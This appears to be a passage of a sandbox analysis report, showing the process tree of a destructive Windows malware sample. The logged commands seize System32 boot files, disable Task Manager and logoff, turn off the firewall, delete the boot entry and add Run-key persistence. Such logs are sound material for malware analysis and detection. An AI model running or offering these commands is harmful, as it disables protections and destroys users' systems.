        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        9⤵
        Views/modifies file attributes
        
        PID:9768
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8688
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:7816
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:1160
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:9288
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:6632
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\53D3.tmp\53D4.tmp\53D5.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:10212
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        9⤵
        
        PID:10900
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:9176
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        9⤵
        
        PID:11208
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        9⤵
        
        PID:9624
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        9⤵
        Views/modifies file attributes
        
        PID:11176
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        9⤵
        Modifies file permissions
        
        PID:4460
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        9⤵
        Possible privilege escalation attempt
        
        PID:8876
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        9⤵
        Views/modifies file attributes
        
        PID:10956
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:10216
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8508
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:7404
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:7788
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:10092
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6E12.tmp\6E13.tmp\6E14.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:7640
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        9⤵
        
        PID:6468
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7828
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        9⤵
        
        PID:3840
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        9⤵
        Modifies file permissions
        
        PID:6068
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        9⤵
        Views/modifies file attributes
        
        PID:5940
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8988
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:5456
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:10164
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:3136
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10364
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10800
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:11084
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10136
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:5536
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        7⤵
        Modifies Windows Firewall
        
        PID:2648
        
        C:\Windows\system32\bcdedit.exe
        
        bcdedit /delete {current}
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:11012
        
        C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        7⤵
        
        PID:7184
        
        C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        7⤵
        
        PID:704
        
        C:\Windows\system32\msg.exe
        
        msg * Has sido hackeado!
        7⤵
        
        PID:6080
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:5128
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5136
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5204
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:5304
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:5328
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FB38.tmp\FB39.tmp\FB3A.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:5548
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:5280
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        
        PID:5220
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:5144
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:5460
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:5680
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Modifies file permissions
        
        PID:4928
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:5944
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:4104
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5996
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:5960
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:5544
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:5724
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:6400
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:6632
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:6936
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:6952
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:5092
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9164
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:4300
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6220
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6348
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6512
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8788
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7652
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8284
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:684
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8604
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:2476
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F298.tmp\F299.tmp\F29A.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:6324
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        9⤵
        
        PID:9588
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Modifies file permissions
        
        PID:8688
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        9⤵
        Possible privilege escalation attempt
        
        PID:6172
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        9⤵
        Modifies file permissions
        
        PID:6364
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        9⤵
        Views/modifies file attributes
        
        PID:10404
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        9⤵
        
        PID:9348
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        9⤵
        Modifies file permissions
        
        PID:10468
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        9⤵
        Views/modifies file attributes
        
        PID:10904
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        9⤵
        Modifies file permissions
        
        PID:5468
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        9⤵
        Modifies file permissions
        
        PID:4312
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        9⤵
        
        PID:4460
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:7096
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8380
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:5324
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:7932
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:9056
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\72A.tmp\72B.tmp\72C.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:952
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        9⤵
        
        PID:7176
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        
        PID:11028
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        9⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:10384
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        9⤵
        Modifies file permissions
        
        PID:10896
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        9⤵
        Views/modifies file attributes
        
        PID:9244
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        9⤵
        Possible privilege escalation attempt
        
        PID:7500
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        9⤵
        Possible privilege escalation attempt
        
        PID:11248
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        9⤵
        Views/modifies file attributes
        
        PID:6436
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        9⤵
        Possible privilege escalation attempt
        
        PID:4312
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:9152
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:9236
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:9352
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:9452
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:9884
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2292.tmp\2293.tmp\2294.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:10144
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        9⤵
        
        PID:11076
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        
        PID:10724
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        9⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7716
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        9⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2364
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        9⤵
        Views/modifies file attributes
        
        PID:10440
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        9⤵
        Possible privilege escalation attempt
        
        PID:10884
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        9⤵
        Possible privilege escalation attempt
        
        PID:5696
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        9⤵
        Views/modifies file attributes
        
        PID:5672
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:10092
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:5628
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:6396
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:9300
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10092
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:6764
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:7184
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:8304
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:7648
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        7⤵
        Modifies Windows Firewall
        
        PID:8632
        
        C:\Windows\system32\bcdedit.exe
        
        bcdedit /delete {current}
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:10808
        
        C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        7⤵
        
        PID:9380
        
        C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        7⤵
        
        PID:6768
        
        C:\Windows\system32\msg.exe
        
        msg * Has sido hackeado!
        7⤵
        
        PID:10760
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\drivers" /r
        7⤵
        
        PID:11208
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:5368
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5408
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5512
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:5612
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:5732
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\932.tmp\933.tmp\934.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:5880
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:4232
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Modifies file permissions
        
        PID:2572
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Modifies file permissions
        
        PID:6136
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2712
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:1712
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:5668
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5944
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:5144
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Modifies file permissions
        
        PID:5544
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:1836
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:4472
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:1348
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:1652
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:1712
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:4472
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:7408
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:7744
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:4532
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8184
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6032
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7732
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:2468
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7736
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7804
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:5092
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7972
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:4196
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:3668
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B169.tmp\B16A.tmp\B16B.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:8204
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        9⤵
        
        PID:3116
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        
        PID:9136
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        9⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:9132
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        9⤵
        
        PID:5860
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        9⤵
        Views/modifies file attributes
        
        PID:9284
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        9⤵
        
        PID:9548
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        9⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:10212
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        9⤵
        Views/modifies file attributes
        
        PID:5456
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        9⤵
        Modifies file permissions
        
        PID:1848
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        9⤵
        Possible privilege escalation attempt
        
        PID:10376
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        9⤵
        
        PID:10936
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        9⤵
        
        PID:11228
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        9⤵
        
        PID:11244
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        9⤵
        
        PID:5956
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        9⤵
        Gathers network information
        
        PID:10344
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        9⤵
        
        PID:11208
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        9⤵
        Views/modifies file attributes
        
        PID:6884
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:7468
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:860
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8272
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8324
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:8800
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C3D8.tmp\C3D9.tmp\C3DA.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:8940
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        9⤵
        
        PID:9844
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        
        PID:9708
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        9⤵
        
        PID:9344
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        9⤵
        Possible privilege escalation attempt
        
        PID:9340
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        9⤵
        Views/modifies file attributes
        
        PID:5956
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        9⤵
        
        PID:10092
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        9⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8304
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        9⤵
        
        PID:10328
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        9⤵
        Possible privilege escalation attempt
        
        PID:10264
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        9⤵
        Modifies file permissions
        
        PID:10380
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        9⤵
        Views/modifies file attributes
        
        PID:8160
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        9⤵
        
        PID:10896
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        9⤵
        
        PID:5692
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        9⤵
        
        PID:6340
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        9⤵
        Gathers network information
        
        PID:3840
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
